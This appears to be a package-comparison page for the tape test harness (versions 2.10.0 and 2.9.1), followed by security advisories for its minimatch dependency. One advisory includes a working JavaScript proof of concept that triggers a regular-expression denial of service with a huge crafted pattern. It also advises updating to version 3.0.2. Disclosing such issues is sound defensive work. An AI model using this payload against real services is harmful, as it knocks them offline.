Tape version 2.10.0 represents a refinement of the popular TAP-producing test harness, building upon the foundation established by version 2.9.1. A key divergence lies in the introduction of glob as a dependency in version 2.10.0. Developers leveraging the newer version gain enhanced file matching capabilities within their tests, simplifying the process of including multiple test files or filtering them based on patterns. This can be particularly useful in larger projects where organization and selective test execution are crucial.
While the core functionalities and developer experience remain largely consistent, version 2.10.0 offers a tangible advantage for projects dealing with file-based testing. The other dependencies and devDependencies remain the same across both versions, indicating stability in the underlying testing infrastructure. This means developers can upgrade with confidence, expecting the familiar seamless integration with existing testing workflows. The development dependencies like tap, falafel, and concat-stream continue to support robust testing and code analysis.
Ultimately, the choice between versions hinges on the specific testing needs of the project. If file globbing is a recurring necessity, version 2.10.0 offers a significant productivity boost. Otherwise, version 2.9.1 remains a solid choice, providing a reliable and well-established testing environment. Both iterations retain the MIT license, facilitating open-source usage and modification. James Halliday (substack) continues authorship solidifing the library's reliable history and well known author.
All the vulnerabilities related to the version 2.10.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.